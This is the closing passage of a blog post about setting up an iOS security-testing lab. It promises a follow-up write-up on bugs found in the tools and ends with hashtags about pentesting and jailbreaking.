
I hope this guide is helpful for those looking to set up their iOS testing labs. I will be following up with a writeup on several bugs I've found with these tools and hopefully point towards typical issues to look out for.

#ios #pentest #cybersecurity #frida #jailbreak

Enter your email to subscribe to updates.